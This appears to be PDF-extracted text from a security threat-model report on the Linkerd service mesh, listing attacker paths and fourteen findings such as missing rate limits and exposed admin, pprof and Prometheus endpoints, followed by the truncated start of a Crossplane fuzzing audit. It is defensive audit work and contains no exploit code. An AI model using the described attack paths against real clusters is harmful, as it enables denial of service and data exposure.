Attacker An internal attacker with access to an \n external service that hosts an \n infrastructure operator’s YAML files \n may be able to manipulate the \n underlying infrastructure. The \n documentation should note that \n accepting external configurations from \n arbitrary sources is always risky. \n External \n Attacker If the specified connection protocol is \n insecure, an external attacker without \n access to any external service may \n T r a i l o f B i t s 24 Linkerd Threat Model \n C O N F I D E N T I A L \n perform a man-in-the-middle attack \n against the CLI tool as it fetches \n infrastructural YAML definitions. The \n documentation should note the \n insecure protocols that are accepted \n by the CLI tool, which should be used \n with caution. \n External linkerd-viz \n Namespace External \n Attacker An external attacker can conduct \n supply chain attacks to compromise \n the confidentiality of data provided by \n linkerd-viz APIs and extensions. \n For instance, an attacker could modify \n JavaScript libraries used by \n linkerd-viz components for UI \n dashboards. \n An attacker may be able to reach \n linkerd-viz APIs externally via a \n number of common web application \n attacks, such as cross-site scripting, \n cross-site request forgery, and \n clickjacking. \n Infrastructure \n Operator Infrastructure operators must ensure \n that they do not unintentionally \n expose linkerd-viz applications \n externally, and they must understand \n the risks inherent in exposing \n linkerd-viz related data. This is \n especially important given that \n linkerd-viz components such as \n the web UI do not require \n authorization once exposed. \n User \n Application \n Namespaces External Internal \n Attacker An internal attacker could exploit \n external services by leveraging \n connections to them from user \n applications. \n For instance, if a Linkerd-integrated \n user application connects to a remote \n web server, an internal attacker could \n send malicious payloads to the server \n T r a i l o f B i t s 25 Linkerd Threat Model \n C O N F I D E N T I A L \n through such a connection. \n User \n Application \n Namespaces User \n Application \n Namespaces Internal \n Attacker An internal attacker can disable an \n application’s sidecar proxy, effectively \n bringing the user application offline. \n This can be done by exposing admin \n endpoints on the sidecar proxy. \n Exposing admin endpoints can also \n expose proxy metrics and other \n potentially sensitive information. \n Infrastructure \n Operator Infrastructure operators must ensure \n that appropriate logging procedures \n are in place; logs can serve as an audit \n trail in the event of an attack. Logs can \n help determine whether two \n components have tried to \n communicate inappropriately, \n indicating that the pod may have been \n compromised. \n User \n Application \n Namespaces Linkerd \n Namespace Internal \n Attacker An internal attacker could send \n requests to the destination and \n identity controllers to try to perform a \n denial-of-service attack against them. \n For instance, if an attacker changes \n the availability of an application, \n causing updates to be made in the \n destination controller, and \n continuously requests a newly signed \n certificate (as if he were a new proxy \n initializing for the first time), the \n identity service would be forced to \n perform signing operations for the \n attacker. \n This highlights the need for \n appropriate logging within the Linkerd \n namespace to prevent such attacks \n and for access controls to ensure that \n routing information for unrelated \n pods or containers cannot be \n obtained. \n T r a i l o f B i t s 26 Linkerd Threat Model \n C O N F I D E N T I A L \n Additionally, the documentation \n should describe best practices \n regarding the use of Kubernetes \n access controls to ensure that lateral \n movement across namespaces is not \n possible. \n Infrastructure \n Operator Infrastructure operators must ensure \n that they maintain restrictive access \n controls, limiting access to admin \n endpoints and other services that \n could increase the attack surface area \n or interrupt the availability of the \n system. \n Additionally, they must be conscious \n of access controls and namespace \n isolations so as not to allow lateral \n movement across namespaces. \n User \n Application \n Namespaces linkerd-viz \n Namespace Internal \n Attacker Internal attackers with access that is \n restricted to the application \n namespace could reach Prometheus \n endpoints to obtain metrics data that \n could give them insight into other \n cluster components that they would \n not otherwise have visibility into. \n External \n Attacker If an external attacker finds a \n vulnerability in an application in the \n user application namespace that gives \n her access to the application server, \n she can call the Prometheus API to \n obtain information about other \n resources in the cluster. \n Linkerd \n Namespace External Internal \n Attacker An internal attacker with access to the \n Linkerd namespace may be able to \n change certificate and routing \n information stored within the identity \n and destination services, respectively. \n This could prevent traffic from \n reaching the intended external \n services. \n T r a i l o f B i t s 27 Linkerd Threat Model \n C O N F I D E N T I A L \n Infrastructure \n Operator An operator may unintentionally \n expose access to the sidecar proxies \n for the identity, destination, and \n proxy-injector controllers, allowing \n external traffic to be routed into the \n proxy and exposing the admin panel \n to the outside world. \n Kubernetes access controls must be \n managed appropriately to prevent \n lateral movement within the cluster. \n Linkerd \n Namespace User \n Application \n Namespaces Internal \n Attacker An internal attacker with access to the \n Linkerd namespace may be able to \n change certificate and routing \n information stored within the identity \n and destination services, respectively. \n This could expose user application \n traffic to unintended parties and could \n leak sensitive secrets. \n Furthermore, an internal attacker with \n access to the Linkerd namespace may \n be able to inject malicious \n components into the user application \n namespaces, as the proxy-injector \n does. This could compromise the user \n application namespaces. \n Linkerd \n Namespace Linkerd \n Namespace Internal \n Attacker An internal attacker may obtain access \n to certificates or destination routing \n information for Linkerd \n proxy–integrated components within \n the cluster. An attacker may also be \n able to change routing information to \n leak sensitive application data or to \n break Linkerd controllers across the \n cluster. \n An internal attacker may also access \n sidecar proxy admin shutdown \n endpoints, which may affect service \n availability. \n T r a i l o f B i t s 28 Linkerd Threat Model \n C O N F I D E N T I A L \n Linkerd \n Namespace linkerd-viz \n Namespace Internal \n Attacker An internal attacker who is able to \n forward ports for services running in \n the Linkerd namespace may be able to \n shut down control plane proxies, \n preventing the linkerd-viz \n extensions from querying Linkerd \n control plane components for metrics \n data. \n linkerd-viz \n Namespace External Internal \n Attacker An internal attacker with the ability to \n configure external connections for the \n Prometheus and Grafana extensions \n could modify their configurations so \n that they communicate with \n attacker-controlled endpoints, \n allowing the attacker to collect cluster \n metrics that could be useful when \n formulating attacks. \n linkerd-viz \n Namespace User \n Application \n Namespaces Internal \n Attacker An internal attacker could \n compromise the TAP injector, allowing \n her to leak user application data and \n compromise pods in the user \n application namespaces. \n linkerd-viz \n Namespace Linkerd \n Namespace Internal \n Attacker An internal attacker could \n compromise the TAP injector to \n modify annotations made to proxies in \n the Linkerd namespace, allowing him \n to compromise the proxies and \n potentially disable communication \n with control plane components. \n linkerd-viz \n Namespace linkerd-viz \n Namespace Internal \n Attacker An internal attacker who is able to \n forward ports for the linkerd-viz \n endpoint may be able to disable \n linkerd-viz proxies by leveraging \n the shutdown admin endpoint \n exposed on the sidecar proxies, \n effectively removing the ability to \n collect metrics and diagnostics data \n typically provided by linkerd-viz \n extensions. \n T r a i l o f B i t s 29 Linkerd Threat Model \n C O N F I D E N T I A L \n Infrastructure \n Operator An infrastructure operator must \n ensure that linkerd-viz extensions \n are not exposed on the internet, as \n the exposure of a linkerd-viz \n extension could affect the availability \n of other components within the same \n linkerd-viz namespace. Operators \n should be careful to minimize the \n exposed attack surface area. \n T r a i l o f B i t s 30 Linkerd Threat Model \n C O N F I D E N T I A L \n S u m m a r y o f F i n d i n g s \n The table below summarizes the findings of the review, including type and severity details. \n ID Title Type Severity \n 1 Lack of rate-limiting mechanisms in the identity \n service Denial of \n Service Low \n 2 Lack of rate-limiting mechanisms in the \n destination service Denial of \n Service Low \n 3 CLI tool allows the use of insecure protocols when \n externally sourcing infrastructure definitions Awareness and \n Training Medium \n 4 Exposure of admin endpoint may affect \n application availability Awareness and \n Training Medium \n 5 Go’s pprof endpoints enabled by default in all \n admin servers Audit and \n Accountability Inform ational \n 6 Lack of access controls on the linkerd-viz \n dashboard Access Controls Low \n 7 Prometheus endpoints reachable from the user \n application namespace Access Controls Low \n 8 Lack of egress access controls Access Controls Low \n 9 Prometheus endpoints are unencrypted and \n unauthenticated by default Access Controls Low \n 10 Shared identity and destination services in a \n cluster poses risks to multi-application clusters System and \n Communication \n s Protection Medium \n 11 Lack of isolation between components and their \n sidecar proxies System and \n Communication \n s Protection Low \n T r a i l o f B i t s 31 Linkerd Threat Model \n C O N F I D E N T I A L \n 12 Lack of centralized security best practices \n documentation Awareness and \n Training Inform ational \n 13 Unclear distinction between Linkerd and Linkerd2 \n in official Linkerd blog post guidance Awareness and \n Training Inform ational \n 14 Insufficient logging of outbound HTTPS calls Audit and \n Accountability Low \n T r a i l o f B i t s 32 Linkerd Threat Model \n C O N F I D E N T I A L \n D e t a i l e d F i n d i n g s \n 1 . L a c k o f r a t e - l i m i t i n g m e c h a n i s m s i n t h e i d e n t i t y s e r v i c e \n Severity: Low Difficulty: High \n Type: Denial of Service Finding ID: TOB-LKDTM-1 \n Target: Identity service \n D e s c r i p t i on \n The identity service issues signed certificates to sidecar proxies within Linkerd-integrated \n infrastructure. When proxies initialize for the first time, they request a certificate from the \n identity service. However, the identity service lacks sufficient rate-limiting mechanisms, \n which may make it prone to denial-of-service attacks. \n Because identity controllers are shared among pods in a cluster, denial of service of an \n identity controller may affect the availability of applications across the cluster. \n T h r e a t S c e n a r i o \n An attacker obtains access to the sidecar proxy in one of the user application namespaces. \n Due to the lack of rate-limiting mechanisms within the identity service, the proxy can now \n repeatedly request a newly signed certificate as if it were a proxy sidecar initializing for the \n first time. \n R e c om m e n d a t i on s \n Short term, add rate-limiting mechanisms to the identity service to prevent a single pod \n from requesting too many certificates or performing other computationally intensive \n actions. \n Long term, ensure that appropriate rate-limiting mechanisms exist throughout the \n infrastructure to prevent denial-of-service attacks. Where possible, implement stricter \n access controls to ensure that components cannot interact with APIs more than necessary. \n Additionally, ensure that the system sufficiently logs events so that an audit trail is available \n in the event of an attack. \n T r a i l o f B i t s 33 Linkerd Threat Model \n C O N F I D E N T I A L \n 2 . L a c k o f r a t e - l i m i t i n g m e c h a n i s m s i n t h e d e s t i n a t i o n s e r v i c e \n Severity: Low Difficulty: High \n Type: Denial of Service Finding ID: TOB-LKDTM-2 \n Target: Destination service \n D e s c r i p t i on \n The destination service contains traffic-routing information for sidecar proxies within \n Linkerd-integrated infrastructure. However, the destination service lacks sufficient \n rate-limiting mechanisms, which may make it prone to denial-of-service attacks if a pod \n repeatedly changes its availability status. \n Because destination controllers are shared among pods in a cluster, denial of service of a \n destination controller may affect the availability of applications across the cluster. \n T h r e a t S c e n a r i o \n An attacker obtains access to the sidecar proxy in one of the user application namespaces. \n Due to the lack of rate-limiting mechanisms within the destination service, the proxy can \n now repeatedly request routing information or change its availability status to force \n updates in the controller. \n R e c om m e n d a t i on s \n Short term, add rate-limiting mechanisms to the destination service to prevent a single pod \n from requesting too much routing information or performing state updates too quickly. \n Long term, ensure that appropriate rate-limiting mechanisms exist throughout the \n infrastructure to prevent denial-of-service attacks. Where possible, implement stricter \n access controls to ensure that components cannot interact with APIs more than necessary. \n Additionally, ensure that the system sufficiently logs events so that an audit trail is available \n in the event of an attack. \n T r a i l o f B i t s 34 Linkerd Threat Model \n C O N F I D E N T I A L \n 3 . CL I t ool a l l o w s t h e u s e o f i n s e c u r e p r o t o c o l s w h e n e x t e r n a l l y s o u r c i n g \n i n f r a s t r u c t u r e d e fi n i t i on s \n Severity: Medium Difficulty: Low \n Type: Awareness and Training Finding ID: TOB-LKDTM-3 \n Target: CLI tool \n D e s c r i p t i on \n When using the command-line interface (CLI) tool, an operator may source infrastructural \n YAML definitions from a URI path specifying any protocol, such as http:// or https:// . \n Therefore, a user could expose sensitive information when using an insecure protocol such \n as HTTP. Furthermore, the Linkerd documentation does not warn users about the system’s \n use of insecure protocols. \n T h r e a t S c e n a r i o \n An infrastructure operator integrates Linkerd into her infrastructure. When doing so, she \n uses the CLI tool to fetch YAML definitions over HTTP. Unbeknownst to her, the use of HTTP \n has made her data visible to attackers on the local network. Her data is also prone to \n man-in-the-middle attacks. \n R e c om m e n d a t i on s \n Short term, disallow the use of insecure protocols within the CLI tool when sourcing \n external data. Alternatively, provide documentation and best practices regarding the use of \n insecure protocols when externally sourcing data within the CLI tool. \n T r a i l o f B i t s 35 Linkerd Threat Model \n C O N F I D E N T I A L \n 4 . E x p os u r e o f a d m i n e n d p oi n t m a y a \u0000 e c t a p p l i c a t i o n a v a i l a b i l i t y \n Severity: Medium Difficulty: Medium \n Type: Awareness and Training Finding ID: TOB-LKDTM-4 \n Target: linkerd-proxy \n D e s c r i p t i on \n User application sidecar proxies expose an admin endpoint that can be used for tasks such \n as shutting down the proxy server and collecting metrics. This endpoint is exposed to other \n components within the same pod. Therefore, an internal attacker could shut down the \n proxy, affecting the user application’s availability. \n Furthermore, the admin endpoint lacks access controls, and the documentation does not \n warn of the risks of exposing the admin endpoint over the internet. \n T h r e a t S c e n a r i o \n An infrastructure operator integrates Linkerd into their Kubernetes cluster. After a new \n user application is deployed, an underlying component within the same pod is \n compromised. An attacker with access to the compromised component can now laterally \n send a request to the admin endpoint used to shut down the proxy server, resulting in a \n denial of service of the user application. \n R e c om m e n d a t i on s \n Short term, employ authentication and authorization mechanisms behind the admin \n endpoint for proxy servers. \n Long term, document the risks of exposing critical components throughout Linkerd. For \n instance, it is important to note that exposing the admin endpoint on a user application \n proxy server may result in the exposure of a shutdown method, which could be leveraged \n in a denial-of-service attack. \n T r a i l o f B i t s 36 Linkerd Threat Model \n C O N F I D E N T I A L \n 5 . G o ’ s p p r o f e n d p oi n t s e n a b l e d b y d e f a u l t i n a l l a d m i n s e r v e r s \n Severity: Informational Difficulty: High \n Type: Audit and Accountability Finding ID: TOB-LKDTM-5 \n Target: HTTP admin servers \n D e s c r i p t i on \n All core components of the Linkerd infrastructure, in both the data and control planes, \n have an admin server with Go’s server runtime profiler ( pprof ) endpoints on \n /debug/pprof enabled by default. These servers are not exposed to the rest of the cluster \n or to the local network by default. \n T h r e a t S c e n a r i o \n An attacker scans the network in which a Linkerd cluster is configured and discovers that \n an operator forwarded the admin server port to the local network, exposing the pprof \n endpoints to the local network. He connects a profiler to it and gains access to debug \n information, which assists him in mounting further attacks. \n R e c om m e n d a t i on s \n Short term, add a check to http.go that enables pprof endpoints only when Linkerd runs \n in debug or test mode. \n Long term, audit all debug-related functionality to ensure it is not exposed when Linkerd is \n running in production mode. \n R e f e r e n c e s \n ● Your pprof is showing: IPv4 scans reveal exposed net/http/pprof endpoints \n T r a i l o f B i t s 37 Linkerd Threat Model \n C O N F I D E N T I A L \n 6 . L a c k o f a c c e s s c on t r ol s on t h e l i n k e r d - v i z d a s h b o a r d \n Severity: Low Difficulty: High \n Type: Access Controls Finding ID: TOB-LKDTM-6 \n Target: linkerd-viz extensions \n D e s c r i p t i on \n Linkerd operators can enable a set of metrics-focused features by adding the \n linkerd-viz extension. Doing so enables a web UI dashboard that lists detailed \n information about the namespaces, services, pods, containers, and other resources in a \n Kubernetes cluster in which Linkerd is configured. Operators can enable Kubernetes \n role-based access controls to the dashboard; however, no access control options are \n provided by Linkerd. \n T h r e a t S c e n a r i o \n An attacker scans the network in which a Linkerd cluster is configured and discovers an \n exposed UI dashboard. By accessing the dashboard, she gains valuable insight into the \n cluster. She uses the knowledge gained from exploring the dashboard to formulate attacks \n that would expand her access to the network. \n R e c om m e n d a t i on s \n Short term, document recommendations for restructuring access to the linkerd-viz \n dashboard. \n Long term, add authentication and authorization controls for accessing the dashboard. This \n could be done by implementing tokens created via the CLI or client-side authorization logic. \n T r a i l o f B i t s 38 Linkerd Threat Model \n C O N F I D E N T I A L \n 7 . P r om e t h e u s e n d p oi n t s r e a c h a b l e f r o m t h e u s e r a p p l i c a t i o n n a m e s p a c e \n Severity: Low Difficulty: High \n Type: Access Controls Finding ID: TOB-LKDTM-7 \n Target: linkerd-viz extensions \n D e s c r i p t i on \n The linkerd-viz extension provides a Prometheus API that collects metrics data from the \n various proxies and controllers used by the control and data planes. Metrics can include \n various labels with IP addresses, pod IDs, and port numbers. \n T h r e a t S c e n a r i o \n An attacker gains access to a user application pod and calls the API directly to read \n Prometheus metrics. He uses the API to gain information about the cluster that aids him in \n expanding his access across the Kubernetes infrastructure. \n R e c om m e n d a t i on s \n Short term, disallow access to the Prometheus extension from the user application \n namespace. This could be done in the same manner in which access to the web dashboard \n is restricted from within the cluster (e.g., by allowing access only for specific hosts). \n T r a i l o f B i t s 39 Linkerd Threat Model \n C O N F I D E N T I A L \n 8 . L a c k o f e g r e s s a c c e s s c on t r ol s \n Severity: Low Difficulty: High \n Type: Access Controls Finding ID: TOB-LKDTM-8 \n Target: Destination service, linkerd-proxy \n D e s c r i p t i on \n Linkerd provides access control mechanisms for ingress traffic but not for egress traffic. \n Egress controls would allow an operator to impose important restrictions, such as which \n external services and endpoints that a meshed application running in the application \n namespace can communicate with. \n T h r e a t S c e n a r i o \n A user application becomes compromised. As a result, the application code begins making \n outbound requests to malicious endpoints. The lack of access controls on egress traffic \n prevents infrastructure operators from mitigating the situation (e.g., by allowing the \n application to communicate with only a set of allowlisted external services). \n R e c om m e n d a t i on s \n Short term, add support for enforcing egress network policies. A GitHub issue to \n implement this recommendation already exists in the Linkerd repository. \n T r a i l o f B i t s 40 Linkerd Threat Model \n C O N F I D E N T I A L \n 9 . P r om e t h e u s e n d p oi n t s a r e u n e n c r y p t e d a n d u n a u t h e n t i c a t e d b y d e f a u l t \n Severity: Low Difficulty: High \n Type: Access Controls Finding ID: TOB-LKDTM-9 \n Target: linkerd-viz extensions \n D e s c r i p t i on \n The linkerd-viz extension provides a Prometheus API that collects metrics data from the \n various proxies and controllers used by the control and data planes. However, this \n endpoint is unencrypted and unauthenticated, lacking access and confidentiality controls \n entirely. \n T h r e a t S c e n a r i o \n An attacker gains access to a sibling component within the same namespace in which the \n Prometheus endpoint exists. Due to the lack of access controls, the attacker can now \n laterally obtain Prometheus metrics with ease. Additionally, due to the lack of \n confidentiality controls, such as those implemented through the use of cryptography, \n connections are exposed to other parties. \n R e c om m e n d a t i on s \n Short term, consider implementing access controls within Prometheus and Kubernetes to \n disallow access to the Prometheus metrics endpoint from any machine within the cluster \n that is irrelevant to Prometheus logging. Additionally, implement secure encryption of \n connections with the use of TLS within Prometheus or leverage existing Linkerd mTLS \n schemes. \n T r a i l o f B i t s 41 Linkerd Threat Model \n C O N F I D E N T I A L \n 1 0 . S h a r e d i d e n t i t y a n d d e s t i n a t i on s e r v i c e s i n a c l u s t e r p o s e s r i s k s t o \n m u l t i - a p p l i c a t i on c l u s t e r s \n Severity: Medium Difficulty: High \n Type: System and Communications \n Protection Finding ID: TOB-LKDTM-10 \n Target: Destination and identity services \n D e s c r i p t i on \n The identity and destination controllers are meant to convey certificate and routing \n information for proxies, respectively. However, only one identity controller and one \n destination controller are deployed in a cluster, so they are shared among all application \n pods within a cluster. As a result, a single application pod could pollute records, causing \n denial-of-service attacks or otherwise compromising these cluster-wide components. \n Additionally, a compromise of these cluster-wide components may result in the exposure \n of routing information for each application pod. \n Although the Kubernetes API server is exposed with the same architecture, it may be \n beneficial to minimize the attack surface area and the data that can be exfiltrated from \n compromised Linkerd components. \n T h r e a t S c e n a r i o \n An attacker gains access to a single user application pod and begins to launch attacks \n against the identity and destination services. As a result, these services cannot serve other \n user application pods. The attacker later finds a way to compromise one of these two \n services, allowing her to leak sensitive application traffic from other user application pods. \n R e c om m e n d a t i on s \n Short term, implement per-pod identity and destination services that are isolated from \n other pods. If this is not viable, consider documenting this caveat so that users are aware \n of the risks of hosting multiple applications within a single cluster. \n T r a i l o f B i t s 42 Linkerd Threat Model \n C O N F I D E N T I A L \n 1 1 . L a c k o f i s ol a t i on b e t w e e n c om p o n e n t s a n d t h e i r s i d e c a r p r o x i e s \n Severity: Low Difficulty: High \n Type: System and Communications \n Protection Finding ID: TOB-LKDTM-11 \n Target: linkerd-proxy \n D e s c r i p t i on \n Within the Linkerd, linkerd-viz , and user application namespaces, each core component \n lives alongside a linkerd-proxy container, which proxies the component’s traffic and \n provides mTLS for internal connections. However, because the sidecar proxies are not \n isolated from their corresponding components, the compromise of a component would \n mean the compromise of its proxy, and vice versa. \n This is particularly interesting when considering the lack of access controls for some \n components, as detailed in TOB-LKDTM-4 : proxy admin endpoints are exposed to the \n applications they are proxying, allowing metrics collection and shutdown requests to be \n made. \n T h r e a t S c e n a r i o \n An attacker exploits a vulnerability to gain access to a linkerd-proxy instance. As a \n result, the attacker is able to compromise the confidentiality, integrity, and availability of \n lateral components, such as user applications, identity and destination services within the \n Linkerd namespace, and extensions within the linkerd-proxy namespace. \n R e c om m e n d a t i on s \n Short term, document system caveats and sensitivities so that operators are aware of them \n and can better defend themselves against attacks. Consider employing health checks that \n verify the integrity of proxies and other components to ensure that they have not been \n compromised. \n Long term, investigate ways to isolate sidecar proxies from the components they are \n proxying (e.g., by setting stricter access controls or leveraging isolated namespaces \n between proxied components and their sidecars). \n T r a i l o f B i t s 43 Linkerd Threat Model \n C O N F I D E N T I A L \n 1 2 . L a c k o f c e n t r a l i z e d s e c u r i t y b e s t p r a c t i c e s d o c u m e n t a t i o n \n Severity: Informational Difficulty: Informational \n Type: Awareness and Training Finding ID: TOB-LKDTM-12 \n Target: Linkerd \n D e s c r i p t i on \n While security recommendations are included throughout Linkerd’s technical guidance \n documents , there is no centralized guidance on security best practices. Furthermore, the \n documentation on securing clusters lacks guidance on security best practices such as \n configuring timeouts and retries, authorization policy recommendations for defense in \n depth, and locking down access to linkerd-viz components. \n T h r e a t S c e n a r i o \n A user is unaware of security best practices and configures Linkerd in an insecure manner. \n As a result, her Linkerd infrastructure is prone to attacks that could compromise the \n confidentiality, integrity, and availability of data handled by the cluster. \n R e c om m e n d a t i on s \n Short term, develop centralized documentation on security recommendations with a focus \n on security-in-depth practices for users to follow. This guidance should be easy to locate \n should any user wish to follow security best practices when using Linkerd. \n T r a i l o f B i t s 44 Linkerd Threat Model \n C O N F I D E N T I A L \n 1 3 . U n c l e a r d i s t i n c t i on b e t w e e n L i n k e r d a n d L i n k e r d 2 i n o \u0000 c i a l L i n k e r d b l o g \n p os t g u i d a n c e \n Severity: Informational Difficulty: Informational \n Type: Awareness and Training Finding ID: TOB-LKDTM-13 \n Target: Linkerd \n D e s c r i p t i on \n The official Linkerd documentation clearly indicates the version of Linkerd that each \n document pertains to. For instance, documentation specific to Linkerd 1.x displays a \n message stating, “This is not the latest version of Linkerd!” However, guidance documented \n in blog post form on the same site does not provide such information. For instance, the \n first result of a Google search for “Linkerd RBAC” is a Linkerd blog post with guidance that is \n applicable only to linkerd 1.x, but there is no indication of this fact on the page. As a result, \n users who rely on these blog posts may misunderstand functionality in Linkerd versions 2.x \n and above. \n T h r e a t S c e n a r i o \n A user searches for guidance on implementing various Linkerd features and finds \n documentation in blog posts that applies only to Linkerd version 1.x. As a result, he \n misunderstands Linkerd and its threat model, and he makes configuration mistakes that \n lead to security issues. \n R e c om m e n d a t i on s \n Short term, on Linkerd blog post pages, add indicators similar to the UI elements used in \n the Linkerd documentation to clearly indicate which version each guidance page applies to. \n T r a i l o f B i t s 45 Linkerd Threat Model \n C O N F I D E N T I A L \n 1 4 . I n s u \u0000 c i e n t l og g i n g o f ou t b ou n d H T T P S c a l l s \n Severity: Low Difficulty: High \n Type: Audit and Accountability Finding ID: TOB-LKDTM-14 \n Target: linkerd-viz \n D e s c r i p t i on \n Linkerd operators can use the linkerd-viz extensions such as Prometheus and Grafana \n to collect metrics for the various proxies in a Linkerd infrastructure. However, these \n extensions do not collect metrics on outbound calls made by meshed applications. This \n limits the data that operators could use to conduct incident response procedures if \n compromised applications reach out to malicious external services and servers. \n T h r e a t S c e n a r i o \n A meshed application running in the data plane is compromised as a result of a supply \n chain attack. Because outbound HTTPS calls are not logged, Linkerd operators are unable \n to collect sufficient data to determine the impact of the vulnerability. \n R e c om m e n d a t i on s \n Short term, implement logging for outbound HTTPS connections. A GitHub issue to \n implement this recommendation already exists in the Linkerd repository but is still \n unresolved as of this writing. \n T r a i l o f B i t s 46 Linkerd Threat Model \n C O N F I D E N T I A L \n A . M e t h o d o l o g y \n A Trail of Bits threat modeling assessment is intended to provide a detailed analysis of the \n risks that an application faces at the structural and operational level; the goal is to assess \n the security of the application’s design rather than its implementation details. During these \n assessments, engineers rely heavily on frequent meetings with the client’s developers and \n on extensive reading of all documentation provided by the client. Code review and dynamic \n testing are not part of the threat modeling process, although engineers may occasionally \n consult the codebase or a live instance of the project to verify assumptions about the \n system’s design. \n Engineers begin a threat modeling assessment by identifying the safeguards and \n guarantees that are critical to maintaining the target system’s confidentiality, integrity, and \n availability. These security controls dictate the assessment’s overarching scope and are \n determined by the requirements of the target system, which may relate to technical and \n reputational concerns, legal liability, and regulatory compliance. \n With these security controls in mind, engineers then divide the system into logical \n components —discrete elem ents that perform specific tasks—and establish trust zones \n around groups of components that lie within a common trust boundary. They identify the \n types of data handled by the system, enumerating the points at which data is sent, \n received, or stored by each component, as well as within and across trust boundaries. \n After establishing a detailed map of the target system’s structure and data flows, engineers \n then identify threat actors —anyone who might threaten the target’s security, including both \n malicious external actors and naive internal actors. Based on each threat actor’s initial \n privileges and knowledge, engineers then trace threat actor paths through the system, \n determining the controls and data that a threat actor might be able to improperly access, \n as well as the safeguards that prevent such access. Any viable attack path discovered \n during this process constitutes a finding , which is paired with design recommendations to \n remediate gaps in the system’s defenses. \n Finally, engineers rate the strength of each security control, indicating the general \n robustness of that type of defense against the full spectrum of possible attacks. These \n ratings are provided in the Security Control Maturity Evaluation table. \n T r a i l o f B i t s 47 Linkerd Threat Model \n C O N F I D E N T I A L \n B . S e c u r i t y Co n t r o l s a n d R a t i n g C r i t e r i a \n The following tables describe the security controls and rating criteria used in this report. \n Security Controls \n Category Description \n Access Controls Controls related to authorization, session management, separation of \n duties, etc. \n Audit and \n Accountability Controls related to logging, non-repudiation, monitoring, analysis, \n reporting, etc. \n Awareness and \n Training Controls related to policies, procedures, and related capabilities \n Denial of Service Controls to defend against denial-of-service attacks impacting availability \n Identification and \n Authentication User and system identification and authentication controls \n System and \n Communications \n Protection Network-level controls to protect data \n Rating Criteria \n Rating Description \n Strong No concerns related to the security control were found. \n Satisfactory Only minor issues related to the security control were found; though the \n control may lack certain non-critical operational procedures or security \n measures, their absence does not expose users to a significant degree of \n risk. Remediation in this area is suggested but not urgent. \n Moderate Several issues that may expose users to some degree of risk were found. \n Remediation in this area is recommended. \n Weak Significant issues that are likely to expose users to a substantial degree of \n risk were found. Remediation in this area should be prioritized. \n Missing The security control was found to be nonexistent or totally ineffective for \n its intended purpose, despite being necessary for the system’s security. \n The implementation of this control should be prioritized. \n T r a i l o f B i t s 48 Linkerd Threat Model \n C O N F I D E N T I A L \n Not Applicable The security control is not applicable to this review. \n Not Considered The security control was not considered in this review. \n Further \n Investigation \n Required Further investigation is required to reach a meaningful conclusion. \n Severity Levels \n Severity Description \n Inform ational The issue does not pose an immediate risk but is relevant to security best \n practices. \n Undetermined The extent of the risk was not determined during this engagement. \n Low The risk is small or is not one the client has indicated is important. \n Medium User information is at risk; exploitation could pose reputational, legal, or \n moderate financial risks. \n High The flaw could affect numerous users and have serious reputational, legal, \n or financial implications. \n Difficulty Levels \n Difficulty Description \n Undetermined The difficulty of exploitation was not determined during this engagement. \n Low The threat is well known or common; an attacker can exploit it without \n significant effort or specialized knowledge. \n Medium An attacker must acquire in-depth knowledge of the system or expend a \n non-trivial amount of effort in order to exploit this issue. \n High An attacker must acquire complex insider knowledge or privileged access to \n the system in order to exploit this issue. \n T r a i l o f B i t s 49 Linkerd Threat Model \n C O N F I D E N T I A L \n" } ]
{ "category": "Orchestration & Management", "file_name": "ADA-fuzzing-audit-22.pdf", "project_name": "Crossplane", "subcategory": "Scheduling & Orchestration" }
[ { "data": "P R E S E N T S \nC r o s s p l a n e\nF u z z i n g\nA u d i t\nIn\ncollaboration\nwith\nthe\nCrossplane\nproject\nmaintainers\nand\nThe\nLinux\nFoundation\nA u t h o r s\nAdam\nKorczynski\n<\nadam@adalogics.com\n>\nDavid\nKorczynski\n<\ndavid@adalogics.com\n>\nDate:\n23rd\nMarch,\n2023\nThis\nreport\nis\nlicensed\nunder\nCreative\nCommons\n4.0\n(CC\nBY\n4.0)\nCrossplane\nfuzzing\naudit\n2022\nC N C F\ns e c u r i t y\na n d\nf u z z i n g\na u d i t s\nThis\nreport\ndetails\na\nfuzzing\naudit\ncommissioned\nby\nthe\nCNCF\nand\nthe\nengagement\nis\npart\nof\nthe\nbroader\nefforts\ncarried\nout\nby\nCNCF\nin\nsecuring\nthe\nso\u0000ware\nin\nthe\nCNCF\nlandscape.\nDemonstrating\nand\nensuring\nthe\nsecurity\nof\nthese\nso\u0000ware\npackages\nis\nvital\nfor\nthe\nCNCF\necosystem\nand\nthe\nCNCF\ncontinues\nto\nuse\nstate\nof\nthe\nart\ntechniques\nto\nsecure\nits\nprojects\nas\nwell\nas\ncarrying\nout\nmanual\naudits.\nOver\nthe\nlast\nhandful\nof\nyears,\nCNCF\nhas\nbeen\ninvesting\nin\nsecurity\naudits,\nfuzzing\nand\nso\u0000ware\nsupply\nchain\nsecurity\nthat\nhas\nhelped\nproactively\ndiscover\nand\nfix\nhundreds\nof\nissues.\nFuzzing\nis\na\nproven\ntechnique\nfor\nfinding\nsecurity\nand\nreliability\nissues\nin\nso\u0000ware\nand\nthe\nefforts\nso\nfar\nhave\nenabled\nfuzzing\nintegration\ninto\nmore\nthan\ntwenty\nCNCF\nprojects\nthrough\na\nseries\nof\ndedicated\nfuzzing\naudits.\nIn\ntotal,\nmore\nthan\n350\nbugs\nhave\nbeen\nfound\nthrough\nfuzzing\nof\nCNCF\nprojects.\nThe\nfuzzing\nefforts\nof\nCNCF\nhave\nfocused\non\nenabling\ncontinuous\nfuzzing\nof\nprojects\nto\nensure\ncontinued\nsecurity\nanalysis,\nwhich\nis\ndone\nby\nway\nof\nthe\nopen\nsource\nfuzzing\nproject\nOSS-Fuzz\n1\n.\nCNCF\ncontinues\nwork\nin\nthis\nspace\nand\nwill\nfurther\nincrease\ninvestment\nto\nimprove\nsecurity\nacross\nits\nprojects\nand\ncommunity.\nThe\nfocus\nfor\nfuture\nwork\nis\nintegrating\nfuzzing\ninto\nmore\nprojects,\nenabling\nsustainable\nfuzzer\nmaintenance,\nincreasing\nmaintainer\ninvolvement\nand\nenabling\nfuzzing\nto\nfind\nmore\nvulnerabilities\nin\nmemory\nsafe\nlanguages.\nMaintainers\nwho\nare\ninterested\nin\ngetting\nfuzzing\nintegrated\ninto\ntheir\nprojects\nor\nhave\nquestions\nabout\nfuzzing\nare\nencouraged\nto\nvisit\nthe\ndedicated\ncncf-fuzzing\nrepository\nhttps://github.com/cncf/cncf-fuzzing\nwhere\nquestions\nand\nqueries\nare\nwelcome.\n1\nhttps://github.co